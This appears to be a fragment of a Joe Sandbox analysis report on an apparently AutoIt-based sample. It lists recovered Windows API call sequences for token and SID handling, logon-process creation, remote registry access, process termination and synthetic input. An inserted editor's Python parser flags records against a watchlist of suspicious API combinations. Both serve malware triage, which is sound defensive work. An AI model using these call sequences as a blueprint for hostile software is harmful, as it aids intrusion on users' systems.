                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                          • String ID:
                                                          • API String ID: 4137160315-0
                                                          • Opcode ID: 69092ae24bf053a7c73147aec447af4ec26e1ef9db231d278cf62b0afe075b6f
                                                          • Instruction ID: a4abc56935cb815b30b7c959637571b9ba96630ee5f80a06abaa5798bfcf528d
                                                          • Opcode Fuzzy Hash: 69092ae24bf053a7c73147aec447af4ec26e1ef9db231d278cf62b0afe075b6f
                                                          • Instruction Fuzzy Hash: 0931D272508356ABD720DF14D889F9BB7A9FF88314F000A1DF5859B181CA70E959CF92
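Added example (editor's code, not part of the Joe Sandbox report or its IDA plugin output): a small Python triage parser for the function records in this listing. It splits the text at each "APIs" header, extracts the `Name.MODULE(args), ref: address` lines (including the "Part of subcall function" entries, which belong to a callee rather than the function itself), keeps the Similarity fields, and flags records whose API set satisfies a watchlist. The watchlist and its labels are the editor's own assumptions drawn from records on this page (LoadLibraryExW with GetProcAddress, RegConnectRegistryW, mouse_event, GetTokenInformation with CopySid); the sample input is abbreviated from those records; the MOUSEEVENTF_* bit values come from winuser.h, so the `00008001` passed to mouse_event at 002C77F9 decodes to MOUSEEVENTF_MOVE|MOUSEEVENTF_ABSOLUTE.

```python
import re

# One API line of a Joe Sandbox function record; the three shapes seen in this listing:
#   • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D095D
#   • GetDesktopWindow.USER32 ref: 002C77C0
#   • Part of subcall function 002A8CC7: CopySid.ADVAPI32(00000000,00000000,?), ref: 002A94AE
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
FIELD_LINE = re.compile(r"^\s*•\s*(API String ID|API ID|String ID|Opcode ID):\s*(.*?)\s*$")

# Editor's watchlist (an assumption, not Joe Sandbox signature logic). A tag fires only when
# ALL of its APIs occur in one record, so a lone GetProcAddress from CRT start-up is not flagged.
WATCHLIST = {
    "dynamic API resolution": {"LoadLibraryExW", "GetProcAddress"},
    "remote registry": {"RegConnectRegistryW"},
    "synthetic input": {"mouse_event"},
    "token/SID inspection": {"GetTokenInformation", "CopySid"},
}
# MOUSEEVENTF_* bits from winuser.h, used to decode mouse_event's dwFlags argument.
MOUSEEVENTF = [(0x0001, "MOVE"), (0x0002, "LEFTDOWN"), (0x0004, "LEFTUP"), (0x0008, "RIGHTDOWN"),
               (0x0010, "RIGHTUP"), (0x0020, "MIDDLEDOWN"), (0x0040, "MIDDLEUP"), (0x0800, "WHEEL"),
               (0x8000, "ABSOLUTE")]

# Constructed input: five records abbreviated from this listing (lines not shown are simply absent).
SAMPLE = """\
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00274282,?), ref: 002741D3
• GetProcAddress.KERNEL32(00000000), ref: 002741DA
• Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoInitialize$combase.dll
• API String ID: 3489934621-340411864
APIs
• GetClientRect.USER32(?,?), ref: 002521B8
• String ID:
• API String ID: 1296646539-0
APIs
  • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D091D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D095D
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002D09A9
• API String ID: 4046560759-0
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,002C550C,?,?,00000000,00000001), ref: 002C7796
• GetDesktopWindow.USER32 ref: 002C77C0
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 002C77F9
• API String ID: 4137160315-0
APIs
  • Part of subcall function 002A8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002A8CDE
• GetLengthSid.ADVAPI32(?,00000000,002A904D), ref: 002A9482
• CopySid.ADVAPI32(00000000,00000000,?), ref: 002A94AE
"""


def parse_records(text):
    """Split the listing at each 'APIs' header and parse the record that follows it."""
    records, rec = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            rec = {"apis": [], "subcalls": [], "fields": {}}
            records.append(rec)
            continue
        if rec is None:
            continue
        m = API_LINE.match(line)
        if m:
            entry = {"api": m["api"], "module": m["mod"], "ref": m["ref"],
                     "args": m["args"].split(",") if m["args"] else []}
            if m["caller"]:
                entry["caller"] = m["caller"]
                rec["subcalls"].append(entry)  # belongs to the callee, not to this function
            else:
                rec["apis"].append(entry)
            continue
        f = FIELD_LINE.match(line)
        if f:
            rec["fields"][f.group(1)] = f.group(2)
    return records


def triage(records, watchlist=WATCHLIST):
    """Return the records whose direct+subcall API names satisfy at least one watchlist entry."""
    hits = []
    for idx, rec in enumerate(records):
        names = {e["api"] for e in rec["apis"]} | {e["api"] for e in rec["subcalls"]}
        tags = sorted(tag for tag, need in watchlist.items() if need <= names)
        if tags:
            hits.append({"index": idx, "tags": tags, "refs": [e["ref"] for e in rec["apis"]],
                         "api_string_id": rec["fields"].get("API String ID", "")})
    return hits


def decode_mouse_event_flags(hex_arg):
    """Decode mouse_event's dwFlags as printed in the report, e.g. '00008001' -> ['MOVE', 'ABSOLUTE']."""
    value = int(hex_arg, 16)
    return [name for bit, name in MOUSEEVENTF if value & bit]


if __name__ == "__main__":
    for hit in triage(parse_records(SAMPLE)):
        print(f"record {hit['index']} ({hit['api_string_id'] or 'no API String ID'}): "
              f"{', '.join(hit['tags'])} at {hit['refs'][0]}")
    print("mouse_event dwFlags 00008001 =", "|".join(decode_mouse_event_flags("00008001")))
```

Run it against the full report text (the part of the page from the first "APIs" header onward) to get a list of functions worth opening in the disassembler, keyed by the API String ID that Joe Sandbox prints for each record. Subcall entries are counted toward a record's API set on purpose: the token record above reaches GetTokenInformation only through subcall 002A8CC7, and a watchlist that looked at direct calls alone would miss it.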
                                                          APIs
                                                            • Part of subcall function 002A8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002A8CDE
                                                            • Part of subcall function 002A8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002A8CE8
                                                            • Part of subcall function 002A8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002A8CF7
                                                            • Part of subcall function 002A8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002A8CFE
                                                            • Part of subcall function 002A8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002A8D14
                                                          • GetLengthSid.ADVAPI32(?,00000000,002A904D), ref: 002A9482
                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 002A948E
                                                          • HeapAlloc.KERNEL32(00000000), ref: 002A9495
                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 002A94AE
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,002A904D), ref: 002A94C2
                                                          • HeapFree.KERNEL32(00000000), ref: 002A94C9
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                          • String ID:
                                                          • API String ID: 3008561057-0
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002A9200
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 002A9207
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 002A9216
                                                          • CloseHandle.KERNEL32(00000004), ref: 002A9221
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002A9250
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 002A9264
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 002AC34E
                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 002AC35F
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002AC366
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 002AC36E
                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 002AC385
                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 002AC397
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: CapsDevice$Release
                                                          • String ID:
                                                          • API String ID: 1035833867-0
                                                          APIs
                                                            • Part of subcall function 002516CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00251729
                                                            • Part of subcall function 002516CF: SelectObject.GDI32(?,00000000), ref: 00251738
                                                            • Part of subcall function 002516CF: BeginPath.GDI32(?), ref: 0025174F
                                                            • Part of subcall function 002516CF: SelectObject.GDI32(?,00000000), ref: 00251778
                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 002DC57C
                                                          • LineTo.GDI32(00000000,00000003,?), ref: 002DC590
                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002DC59E
                                                          • LineTo.GDI32(00000000,00000000,?), ref: 002DC5AE
                                                          • EndPath.GDI32(00000000), ref: 002DC5BE
                                                          • StrokePath.GDI32(00000000), ref: 002DC5CE
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                          • String ID:
                                                          • API String ID: 43455801-0
                                                          APIs
                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002707EC
                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 002707F4
                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002707FF
                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0027080A
                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00270812
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0027081A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: Virtual
                                                          • String ID:
                                                          • API String ID: 4278518827-0
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002B59B4
                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002B59CA
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 002B59D9
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B59E8
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B59F2
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B59F9
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 839392675-0
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 002B77FE
                                                          • EnterCriticalSection.KERNEL32(?,?,0025C2B6,?,?), ref: 002B780F
                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,0025C2B6,?,?), ref: 002B781C
                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0025C2B6,?,?), ref: 002B7829
                                                            • Part of subcall function 002B71F0: CloseHandle.KERNEL32(00000000,?,002B7836,?,0025C2B6,?,?), ref: 002B71FA
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 002B783C
                                                          • LeaveCriticalSection.KERNEL32(?,?,0025C2B6,?,?), ref: 002B7843
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 3495660284-0
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002A9555
                                                          • UnloadUserProfile.USERENV(?,?), ref: 002A9561
                                                          • CloseHandle.KERNEL32(?), ref: 002A956A
                                                          • CloseHandle.KERNEL32(?), ref: 002A9572
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 002A957B
                                                          • HeapFree.KERNEL32(00000000), ref: 002A9582
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                          • String ID:
                                                          • API String ID: 146765662-0
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 002C8CFD
                                                          • CharUpperBuffW.USER32(?,?), ref: 002C8E0C
                                                          • VariantClear.OLEAUT32(?), ref: 002C8F84
                                                            • Part of subcall function 002B7B1D: VariantInit.OLEAUT32(00000000), ref: 002B7B5D
                                                            • Part of subcall function 002B7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 002B7B66
                                                            • Part of subcall function 002B7B1D: VariantClear.OLEAUT32(00000000), ref: 002B7B72
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                          • API String ID: 4237274167-1221869570
                                                          APIs
                                                            • Part of subcall function 0026436A: _wcscpy.LIBCMT ref: 0026438D
                                                          • _memset.LIBCMT ref: 002B332E
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002B335D
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002B3410
                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002B343E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                          • String ID: 0
                                                          • API String ID: 4152858687-4108050209
                                                          APIs
                                                          • _memset.LIBCMT ref: 002B2F67
                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 002B2F83
                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 002B2FC9
                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00317890,00000000), ref: 002B3012
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$InfoItem_memset
                                                          • String ID: 0
                                                          • API String ID: 1173514356-4108050209
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002AB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002AB7BD
                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002A9ACC
                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002A9ADF
                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 002A9B0F
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          Strings
                                                          Similarity
                                                          • API ID: MessageSend$_memmove$ClassName
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 365058703-1403004172
                                                          APIs
                                                            • Part of subcall function 00252111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0025214F
                                                            • Part of subcall function 00252111: GetStockObject.GDI32(00000011), ref: 00252163
                                                            • Part of subcall function 00252111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0025216D
                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002D6A86
                                                          • LoadLibraryW.KERNEL32(?), ref: 002D6A8D
                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002D6AA2
                                                          • DestroyWindow.USER32(?), ref: 002D6AAA
                                                          Strings
                                                          Similarity
                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                          • String ID: SysAnimate32
                                                          • API String ID: 4146253029-1011021900
                                                          APIs
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 002B7377
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002B73AA
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 002B73BC
                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002B73F6
                                                          Strings
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 002B7444
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002B7476
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 002B7487
                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002B74C1
                                                          Strings
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 002BB297
                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002BB2EB
                                                          • __swprintf.LIBCMT ref: 002BB304
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,002E0980), ref: 002BB342
                                                          Strings
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                          • String ID: %lu
                                                          • API String ID: 3164766367-685833217
                                                          APIs
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                            • Part of subcall function 002AAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002AAA6F
                                                            • Part of subcall function 002AAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 002AAA82
                                                            • Part of subcall function 002AAA52: GetCurrentThreadId.KERNEL32 ref: 002AAA89
                                                            • Part of subcall function 002AAA52: AttachThreadInput.USER32(00000000), ref: 002AAA90
                                                          • GetFocus.USER32 ref: 002AAC2A
                                                            • Part of subcall function 002AAA9B: GetParent.USER32(?), ref: 002AAAA9
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 002AAC73
                                                          • EnumChildWindows.USER32(?,002AACEB), ref: 002AAC9B
                                                          • __swprintf.LIBCMT ref: 002AACB5
                                                          Strings
                                                          Similarity
                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                          • String ID: %s%d
                                                          • API String ID: 1941087503-1110647743
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 002B2318
                                                          Strings
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                          • API String ID: 3964851224-769500911
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002CF2F0
                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 002CF320
                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 002CF453
                                                          • CloseHandle.KERNEL32(?), ref: 002CF4D4
                                                          Similarity
                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                          • String ID:
                                                          • API String ID: 2364364464-0
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002D147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002D040D,?,?), ref: 002D1491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D075D
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D079C
                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002D07E3
                                                          • RegCloseKey.ADVAPI32(?,?), ref: 002D080F
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 002D081C
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                          • String ID:
                                                          • API String ID: 3440857362-0
                                                          APIs
                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002BEC62
                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002BEC8B
                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002BECCA
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002BECEF
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002BECF7
                                                          Similarity
                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1389676194-0
                                                          • Opcode ID: 6ae1554cd3fa7aa30cba5fd487ee10a785da13267110b20bbf54bc0d5e481b8e
                                                          • Instruction ID: bfa6b71951a65753d4e2aecdd47c6262a7ffe2967605d585b54d0cad2ccb62e5
                                                          • Opcode Fuzzy Hash: 6ae1554cd3fa7aa30cba5fd487ee10a785da13267110b20bbf54bc0d5e481b8e
                                                          • Instruction Fuzzy Hash: EF513B35A10105DFCF01EF64C9859AEBBF5EF08314B148099E809AB362CB31ED65DF54
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: afb44ae0424499a7482d7d275e0bd5f668bd6193ccf0a9bf20823c4382f9c00e
                                                          • Instruction ID: 8c4ff03b6abdf32a23706b684e34c3478eb02bc1c4d213f12b3d3f02b896a930
                                                          • Opcode Fuzzy Hash: afb44ae0424499a7482d7d275e0bd5f668bd6193ccf0a9bf20823c4382f9c00e
                                                          • Instruction Fuzzy Hash: 7641D336924115AFEB10DF28CC89FADFBB8EB09310F154166F816A73D1C7B09D61DAA1
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00252727
                                                          • ScreenToClient.USER32(003177B0,?), ref: 00252744
                                                          • GetAsyncKeyState.USER32(00000001), ref: 00252769
                                                          • GetAsyncKeyState.USER32(00000002), ref: 00252777
                                                          Similarity
                                                          • API ID: AsyncState$ClientCursorScreen
                                                          • String ID:
                                                          • API String ID: 4210589936-0
                                                          • Opcode ID: 4cda145cdb459ab78f55aefcd337f26b6563532b3f8b59c38629ef81fda2281f
                                                          • Instruction ID: 52f535881d6e9408711d08ab885fe3f360a4a0d3ef777505f68339636e42db03
                                                          • Opcode Fuzzy Hash: 4cda145cdb459ab78f55aefcd337f26b6563532b3f8b59c38629ef81fda2281f
                                                          • Instruction Fuzzy Hash: B3416F3552410AFBDF159F64C848AE9FB74FB0A325F208356F824962D0C730AD68DFA0
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 002A95E8
                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 002A9692
                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 002A969A
                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 002A96A8
                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 002A96B0
                                                          Similarity
                                                          • API ID: MessagePostSleep$RectWindow
                                                          • String ID:
                                                          • API String ID: 3382505437-0
                                                          • Opcode ID: c0fa9ff5b4306d9cb0d20354b13b13e342ccb59f6a135486572e75c92a000834
                                                          • Instruction ID: cd7a0b338ac8274682b2f8c36b0fe8efa050123082c2c1d40bcd1f55b8bf6efc
                                                          • Opcode Fuzzy Hash: c0fa9ff5b4306d9cb0d20354b13b13e342ccb59f6a135486572e75c92a000834
                                                          • Instruction Fuzzy Hash: 9731DF31900219EFDF14CFA9D98CA9E3BB9EF46715F104218F924AB1D0C7B099A4CB90
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 002DB804
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 002DB829
                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 002DB841
                                                          • GetSystemMetrics.USER32(00000004), ref: 002DB86A
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,002C155C,00000000), ref: 002DB888
                                                          Similarity
                                                          • API ID: Window$Long$MetricsSystem
                                                          • String ID:
                                                          • API String ID: 2294984445-0
                                                          • Opcode ID: cd6c2c6c2abdb622f548e58e68fb56e32656e9ef6171dbcb5cc03f86d6925473
                                                          • Instruction ID: da1bc38e21f44b8788b5c824dcbc3dff4621ecb6d8a3b26f8ad0a3e8351b881b
                                                          • Opcode Fuzzy Hash: cd6c2c6c2abdb622f548e58e68fb56e32656e9ef6171dbcb5cc03f86d6925473
                                                          • Instruction Fuzzy Hash: EE21B431924256EFCB169F38DC58B6937A8FB09320F16472AF921D72E0D7708C61DB90
                                                          APIs
                                                          • IsWindow.USER32(00000000), ref: 002C6159
                                                          • GetForegroundWindow.USER32 ref: 002C6170
                                                          • GetDC.USER32(00000000), ref: 002C61AC
                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 002C61B8
                                                          • ReleaseDC.USER32(00000000,00000003), ref: 002C61F3
                                                          Similarity
                                                          • API ID: Window$ForegroundPixelRelease
                                                          • String ID:
                                                          • API String ID: 4156661090-0
                                                          • Opcode ID: fe5e648d505f711104fabcd1602d55594a860c71579fa3b445b3aaa5998d9fc9
                                                          • Instruction ID: a2f253f53ec93ebd3bc2f6a2e8326bb390aa2986fe6f693f2727fc84ae67b6c8
                                                          • Opcode Fuzzy Hash: fe5e648d505f711104fabcd1602d55594a860c71579fa3b445b3aaa5998d9fc9
                                                          • Instruction Fuzzy Hash: E521A475A102049FD704EF64DCC8FAABBF9EF48311F048469E84A97352CA70AC55CF90
                                                          APIs
                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00251729
                                                          • SelectObject.GDI32(?,00000000), ref: 00251738
                                                          • BeginPath.GDI32(?), ref: 0025174F
                                                          • SelectObject.GDI32(?,00000000), ref: 00251778
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          • Opcode ID: 622c6dee9eb8d70f813ac8f88b1b0d53909ee3c3400724b7e608e9f242a6a383
                                                          • Instruction ID: e03d82764ab9608b97788baa91e3e778aafb7e5f8d630e6f16517d1bc1acefb9
                                                          • Opcode Fuzzy Hash: 622c6dee9eb8d70f813ac8f88b1b0d53909ee3c3400724b7e608e9f242a6a383
                                                          • Instruction Fuzzy Hash: 9821A730825209EFDB129F58EC8D7E97BBDF708312F188215F815961A0D7B199B6CF54
                                                          APIs
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: dd555e8c9e36884f632a68b974c00483ee7b87cedca7a0aa8e9e12cb479bd1af
                                                          • Instruction ID: 9c76ee5e9cbfd686fb58791bd528f1a2e223e7048371858711de71449b346df7
